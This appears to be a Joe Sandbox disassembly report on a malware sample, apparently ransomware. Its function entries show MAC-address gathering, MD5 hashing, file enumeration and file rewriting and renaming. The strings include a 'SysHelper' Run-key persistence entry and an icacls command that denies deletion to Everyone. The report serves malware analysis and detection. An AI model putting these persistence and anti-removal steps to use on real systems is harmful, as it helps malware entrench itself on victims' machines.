                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  • Opcode ID: 4a848f8ee36800c65e6e6f0f76309336ec8dd666523fdd40e14cc226c6c50398
                                                                                                  • Instruction ID: 0f364c2be3997c3a348351669ed10480bf55795f38024e0563c1b43729509764
                                                                                                  • Opcode Fuzzy Hash: 4a848f8ee36800c65e6e6f0f76309336ec8dd666523fdd40e14cc226c6c50398
                                                                                                  • Instruction Fuzzy Hash: 1151B2B1D40209ABDF10DFA1DC46FEFBB78EB18708F10452AF605B6281D7796A059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1926 47eaa0-47eb09 call 4856d0 CryptAcquireContextW 1929 47eb1c-47eb34 CryptCreateHash 1926->1929 1930 47eb0b-47eb17 call 4a0eca 1926->1930 1932 47eb47-47eb56 CryptHashData 1929->1932 1933 47eb36-47eb42 call 4a0eca 1929->1933 1930->1929 1935 47eb69-47eb87 CryptGetHashParam 1932->1935 1936 47eb58-47eb64 call 4a0eca 1932->1936 1933->1932 1937 47eb9a-47ebcc call 490be4 call 49b420 CryptGetHashParam 1935->1937 1938 47eb89-47eb95 call 4a0eca 1935->1938 1936->1935 1945 47ebdf 1937->1945 1946 47ebce-47ebda call 4a0eca 1937->1946 1938->1937 1948 47ebe1-47ebe4 1945->1948 1946->1945 1949 47ebe6-47ec00 call 4904a6 1948->1949 1950 47ec38-47ec67 call 492110 CryptDestroyHash CryptReleaseContext 1948->1950 1955 47ec13-47ec19 1949->1955 1956 47ec02-47ec11 call 483ea0 1949->1956 1958 47ec20-47ec25 1955->1958 1956->1948 1958->1958 1960 47ec27-47ec36 call 483ea0 1958->1960 1960->1948
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0056FCA4,00000000,00000000,00000000,?), ref: 0047EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB17
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0047EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0047EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EB95
                                                                                                  • _memset.LIBCMT ref: 0047EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0047EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0047EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0047EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: e3913989cf2bc1ca0f04a5fdc0450d57bd8e2b3cb673a0bbacac5233dc70a656
                                                                                                  • Instruction ID: ebcc47b6e14f071e5ea758fd9fe39f53cf53377f2093b69f1edba95c92539f97
                                                                                                  • Opcode Fuzzy Hash: e3913989cf2bc1ca0f04a5fdc0450d57bd8e2b3cb673a0bbacac5233dc70a656
                                                                                                  • Instruction Fuzzy Hash: F451A371D40209ABDF11DBA1DD46FEFBFB8FB18708F10412AF905B6280D7796A059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1963 47e670-47e697 call 490c62 * 2 1968 47e6b4-47e6c2 GetAdaptersInfo 1963->1968 1969 47e699-47e6b3 call 491f2d call 490bed 1963->1969 1970 47e6c4-47e6d9 call 490bed call 490c62 1968->1970 1971 47e6db-47e6e8 GetAdaptersInfo 1968->1971 1970->1969 1970->1971 1975 47e744-47e754 call 490bed 1971->1975 1976 47e6ea-47e73c call 4904a6 call 491f2d * 2 1971->1976 1989 47e741 1976->1989 1989->1975
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0047E67F
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(01320000,00000000,00000001,00000001,?,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490CA5
                                                                                                  • _malloc.LIBCMT ref: 0047E68B
                                                                                                  • _wprintf.LIBCMT ref: 0047E69E
                                                                                                  • _free.LIBCMT ref: 0047E6A4
                                                                                                    • Part of subcall function 00490BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0047E6B9
                                                                                                  • _free.LIBCMT ref: 0047E6C5
                                                                                                  • _malloc.LIBCMT ref: 0047E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0047E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0047E720
                                                                                                  • _wprintf.LIBCMT ref: 0047E732
                                                                                                  • _wprintf.LIBCMT ref: 0047E73C
                                                                                                  • _free.LIBCMT ref: 0047E745
                                                                                                  Strings
                                                                                                  • Address: %s, mac: %s, xrefs: 0047E72D
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0047E699
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0047E71A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 3901070236-1604013687
                                                                                                  • Opcode ID: 3cec3dc43b693c92922658215144e91e1a6dd4cccc4aab93b19f6474bb3491d7
                                                                                                  • Instruction ID: 8790309dbe6c97c09d4c8bd8096284a73353742ced7b4e78400cfe2deb2ac12a
                                                                                                  • Opcode Fuzzy Hash: 3cec3dc43b693c92922658215144e91e1a6dd4cccc4aab93b19f6474bb3491d7
                                                                                                  • Instruction Fuzzy Hash: 371136B29005647ECA61A3B65C06EFF3EDC8F4A715F0401BFFA8CE5241E65C5A00A3B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2367 47fb98-47fb9f 2368 47fba0-47fbb9 2367->2368 2368->2368 2369 47fbbb-47fbcf 2368->2369 2370 47fbd3-47fc02 PathAppendW call 488400 2369->2370 2371 47fbd1 2369->2371 2374 47fc04-47fc0c call 492587 2370->2374 2375 47fc0f-47fc29 2370->2375 2371->2370 2374->2375 2376 47fc2b-47fc2f 2375->2376 2377 47fc49-47fc4c 2375->2377 2380 47fc31-47fc47 call 4905a0 2376->2380 2381 47fc4f-47fc6b PathFileExistsW 2376->2381 2377->2381 2380->2381 2383 47fcdf-47fce5 2381->2383 2384 47fc6d-47fc86 call 490c62 2381->2384 2386 47fce7-47fced call 492587 2383->2386 2387 47fcf0-47fd07 call 487140 2383->2387 2394 47fc8a-47fc9f lstrcpyW 2384->2394 2395 47fc88 2384->2395 2386->2387 2396 47fd0b-47fd20 FindFirstFileW 2387->2396 2397 47fd09 2387->2397 2398 47fca3-47fcdc lstrcatW call 484690 call 47f0e0 call 490bed 2394->2398 2399 47fca1 2394->2399 2395->2394 2400 47fd22-47fd2d call 492587 2396->2400 2401 47fd30-47fd4c 2396->2401 2397->2396 2398->2383 2399->2398 2400->2401 2404 47fd52-47fd55 2401->2404 2405 480072-480076 2401->2405 2409 47fd60-47fd6b 2404->2409 2410 480078-480083 call 492587 2405->2410 2411 480086-4800a4 2405->2411 2415 47fd70-47fd76 2409->2415 2410->2411 2412 4800b1-4800c9 2411->2412 2413 4800a6-4800ae call 492587 2411->2413 2419 4800cb-4800d3 call 492587 2412->2419 2420 4800d6-4800ee 2412->2420 2413->2412 2421 47fd96-47fd98 2415->2421 2422 47fd78-47fd7b 2415->2422 2419->2420 2433 4800fb-48010b 2420->2433 2434 4800f0-4800f8 call 492587 2420->2434 2430 47fd9b-47fd9d 2421->2430 2427 47fd92-47fd94 2422->2427 2428 47fd7d-47fd85 2422->2428 2427->2430 2428->2421 2432 47fd87-47fd90 2428->2432 2435 47fda3-47fdae 2430->2435 2436 480052-480065 FindNextFileW 2430->2436 2432->2415 2432->2427 2434->2433 2439 47fdb0-47fdb6 2435->2439 2436->2409 2438 48006b-48006c FindClose 2436->2438 2438->2405 2441 47fdd6-47fdd8 2439->2441 2442 47fdb8-47fdbb 2439->2442 2443 47fddb-47fddd 2441->2443 2444 47fdd2-47fdd4 2442->2444 2445 47fdbd-47fdc5 2442->2445 2443->2436 2446 47fde3-47fdea 2443->2446 2444->2443 2445->2441 2447 47fdc7-47fdd0 2445->2447 2448 47fec2-47fecc 2446->2448 2449 47fdf0-47fe71 call 487140 call 485ae0 call 484690 call 483b70 2446->2449 2447->2439 2447->2444 2450 47fece-47fed5 call 481ab0 2448->2450 2451 47feda-47fede 2448->2451 2473 47fe73-47fe7e call 492587 2449->2473 2474 47fe81-47fea9 2449->2474 2450->2451 2451->2436 2455 47fee4-47ff13 call 484690 2451->2455 2461 47ff15-47ff17 2455->2461 2462 47ff19-47ff1f 2455->2462 2464 47ff31-47ff6a call 485ae0 PathFindExtensionW 2461->2464 2465 47ff22-47ff2b 2462->2465 2471 47ff6c 2464->2471 2472 47ff9a-47ffa8 2464->2472 2465->2465 2468 47ff2d-47ff2f 2465->2468 2468->2464 2476 47ff70-47ff74 2471->2476 2477 47ffda-47ffde 2472->2477 2478 47ffaa 2472->2478 2473->2474 2474->2436 2475 47feaf-47febd call 492587 2474->2475 2475->2436 2481 47ff76-47ff78 2476->2481 2482 47ff7a 2476->2482 2483 48003a-480042 2477->2483 2484 47ffe0-47ffe9 2477->2484 2485 47ffb0-47ffb4 2478->2485 2490 47ff7c-47ff88 call 491c02 2481->2490 2482->2490 2491 48004f 2483->2491 2492 480044-48004c call 492587 2483->2492 2493 47ffed-47fff9 call 491c02 2484->2493 2494 47ffeb 2484->2494 2487 47ffb6-47ffb8 2485->2487 2488 47ffba 2485->2488 2495 47ffbc-47ffce call 491c02 2487->2495 2488->2495 2504 47ff93 2490->2504 2505 47ff8a-47ff8f 2490->2505 2491->2436 2492->2491 2493->2483 2506 47fffb-48000b 2493->2506 2494->2493 2495->2483 2507 47ffd0-47ffd5 2495->2507 2509 47ff97 2504->2509 2505->2476 2508 47ff91 2505->2508 2510 48000d 2506->2510 2511 48000f-480026 call 491c02 2506->2511 2507->2485 2513 47ffd7 2507->2513 2508->2509 2509->2472 2510->2511 2511->2483 2515 480028-480035 call 4811c0 2511->2515 2513->2477 2515->2483
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: c630898da00a0ce09eb53792f1cbe18631e3ed28ec2be1452c371e6d45527ec6
                                                                                                  • Instruction ID: 36018d5b860116067624692eb221e645cc720771dc3539ef3ee91b91b69551a0
                                                                                                  • Opcode Fuzzy Hash: c630898da00a0ce09eb53792f1cbe18631e3ed28ec2be1452c371e6d45527ec6
                                                                                                  • Instruction Fuzzy Hash: 79B19D70D00208DBDF20EFA4DC45BDEBBB5BF15308F10846AE40AAB251E7799A49CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 985 481cd0-481d1a call 49f7c0 RegOpenKeyExW 988 481d20-481d8d call 49b420 RegQueryValueExW RegCloseKey 985->988 989 482207-482216 985->989 992 481d8f-481d91 988->992 993 481d93-481d9c 988->993 994 481daf-481dcb call 485c10 992->994 995 481da0-481da9 993->995 999 481e7c-481e87 994->999 1000 481dd1-481df8 lstrlenA call 483520 994->1000 995->995 996 481dab-481dad 995->996 996->994 1002 481e89-481e91 call 492587 999->1002 1003 481e94-481f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 999->1003 1007 481e28-481e2c 1000->1007 1008 481dfa-481dfe 1000->1008 1002->1003 1012 481f3a-481f3f 1003->1012 1013 481f36-481f38 1003->1013 1010 481e3c-481e50 PathFileExistsW 1007->1010 1011 481e2e-481e39 call 492587 1007->1011 1014 481e0b-481e23 call 4845a0 1008->1014 1015 481e00-481e08 call 492587 1008->1015 1010->999 1020 481e52-481e57 1010->1020 1011->1010 1019 481f40-481f49 1012->1019 1018 481f4f-481f96 call 485c10 RpcStringFreeW PathAppendW CreateDirectoryW 1013->1018 1014->1007 1015->1014 1032 481f98-481fa0 1018->1032 1033 481fce-481fe9 1018->1033 1019->1019 1023 481f4b-481f4d 1019->1023 1024 481e59-481e5e 1020->1024 1025 481e6a-481e6e 1020->1025 1023->1018 1024->1025 1028 481e60-481e65 call 484690 1024->1028 1025->989 1030 481e74-481e77 1025->1030 1028->1025 1034 4821ff-482204 call 492587 1030->1034 1037 481fa2-481fa4 1032->1037 1038 481fa6-481faf 1032->1038 1035 481feb-481fed 1033->1035 1036 481fef-481ff8 1033->1036 1034->989 1040 48200f-482076 call 485c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1035->1040 1041 482000-482009 1036->1041 1042 481fbf-481fc9 call 485c10 1037->1042 1044 481fb0-481fb9 1038->1044 1050 48207c-482107 call 49b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1050 1051 4821d1-4821d5 1040->1051 1041->1041 1046 48200b-48200d 1041->1046 1042->1033 1044->1044 1048 481fbb-481fbd 1044->1048 1046->1040 1048->1042 1059 482109-482110 call 483260 1050->1059 1060 482115-4821a8 call 49b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1050->1060 1052 4821e2-4821fa 1051->1052 1053 4821d7-4821df call 492587 1051->1053 1052->989 1056 4821fc 1052->1056 1053->1052 1056->1034 1059->1060 1064 4821aa-4821b0 GetLastError 1060->1064 1065 4821b2-4821b8 1060->1065 1064->1051 1066 4821c0-4821cf WaitForSingleObject 1065->1066 1066->1051 1066->1066
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D12
                                                                                                  • _memset.LIBCMT ref: 00481D3B
                                                                                                  • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00481D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00481DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00481E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00481E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00481EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00481EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00481EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00481ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00481EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00481EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00481F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00481F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00481F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00481F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0048202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00482036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0048204C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0048206E
                                                                                                  • _memset.LIBCMT ref: 00482090
                                                                                                  • lstrcpyW.KERNEL32(?,005702FC), ref: 004820AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004820C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004820CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004820D7
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004820F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004820FC
                                                                                                  • _memset.LIBCMT ref: 00482120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00482146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00482158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0048216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: d510b4004a7d8b76a68bc8d17011d013ec1af47358145a7469fd6a11abdc20bf
                                                                                                  • Instruction ID: 76653d7ccd4ec9fb2d3a0a6dbce408fb0ae0ad2ca296ae50a1e7e2e1d7afdcc1
                                                                                                  • Opcode Fuzzy Hash: d510b4004a7d8b76a68bc8d17011d013ec1af47358145a7469fd6a11abdc20bf
                                                                                                  • Instruction Fuzzy Hash: 3AE16F71D00219EBDF24EBA0DD49BEEBBB8BF04304F10446AE605B6291EB746A49DF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1067 4811c0-48121d CreateFileW 1068 4818eb-4818fb 1067->1068 1069 481223-481232 GetFileSizeEx 1067->1069 1070 4812a3-4812be VirtualAlloc 1069->1070 1071 481234 1069->1071 1072 48131a-481331 CloseHandle 1070->1072 1073 4812c0-4812d5 call 49b420 1070->1073 1074 48123c-481281 CloseHandle call 483100 call 4859d0 MoveFileW 1071->1074 1075 481236-48123a 1071->1075 1080 4812db-4812de 1073->1080 1081 4813b1 1073->1081 1074->1068 1091 481287-4812a2 call 492587 1074->1091 1075->1070 1075->1074 1083 4812e9-48130a SetFilePointerEx 1080->1083 1084 4812e0-4812e3 1080->1084 1085 4813b7-4813ef SetFilePointer 1081->1085 1087 48130c-481314 VirtualFree 1083->1087 1088 481332-48134d ReadFile 1083->1088 1084->1081 1084->1083 1089 4815bf 1085->1089 1090 4813f5-48140d ReadFile 1085->1090 1087->1072 1088->1087 1092 48134f-481354 1088->1092 1095 4815c5-4815d9 SetFilePointerEx 1089->1095 1093 48140f-48143f VirtualFree CloseHandle call 482d50 1090->1093 1094 481440-481445 1090->1094 1092->1087 1098 481356-481359 1092->1098 1094->1089 1100 48144b-48146b 1094->1100 1095->1093 1101 4815df-4815eb 1095->1101 1098->1085 1106 48135b-481377 call 482c40 call 487060 1098->1106 1102 481718-4817d9 lstrlenA call 490be4 lstrlenA call 49d8d0 lstrlenA call 47eaa0 call 492110 call 47bbd0 call 47bd50 call 482f70 call 47c070 1100->1102 1103 481471-4815a8 lstrlenA call 490be4 lstrlenA call 49d8d0 lstrlenA call 47eaa0 call 492110 call 47c5c0 call 482d10 call 482d50 call 47bbd0 call 47bd50 call 483ff0 call 482f70 call 47c070 SetFilePointer 1100->1103 1104 4815ed-4815fc WriteFile 1101->1104 1105 48160e-481643 call 4830b0 call 482840 1101->1105 1185 4817e1-48182e call 482d50 call 482c40 call 482bf0 call 47cba0 1102->1185 1103->1185 1196 4815ae-4815ba call 482d50 * 2 1103->1196 1104->1093 1109 481602-48160b call 492110 1104->1109 1130 481645 1105->1130 1131 481647-48165a WriteFile call 482d50 1105->1131 1127 481379-4813a6 VirtualFree CloseHandle call 482d50 1106->1127 1128 4813a7-4813af call 482d50 1106->1128 1109->1105 1128->1085 1130->1131 1131->1093 1145 481660-481680 lstrlenA WriteFile 1131->1145 1145->1093 1148 481686-4816de CloseHandle call 483100 call 4859d0 MoveFileW 1145->1148 1161 4816e4-481717 VirtualFree call 483210 call 482d50 1148->1161 1162 4818a7-4818d3 call 483210 call 482d50 1148->1162 1183 4818e3-4818e6 1162->1183 1184 4818d5-4818dd VirtualFree 1162->1184 1183->1068 1187 4818e8-4818e9 CloseHandle 1183->1187 1184->1183 1203 48186e-4818a6 VirtualFree CloseHandle call 482d50 * 2 1185->1203 1204 481830-481832 1185->1204 1187->1068 1196->1089 1204->1203 1205 481834-48185b WriteFile 1204->1205 1205->1203 1207 48185d-481869 call 482d50 1205->1207 1207->1095
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0048120F
                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00481228
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0048123D
                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00481277
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004812B1
                                                                                                  • _memset.LIBCMT ref: 004812C8
                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00481301
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00481314
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0048131B
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00481349
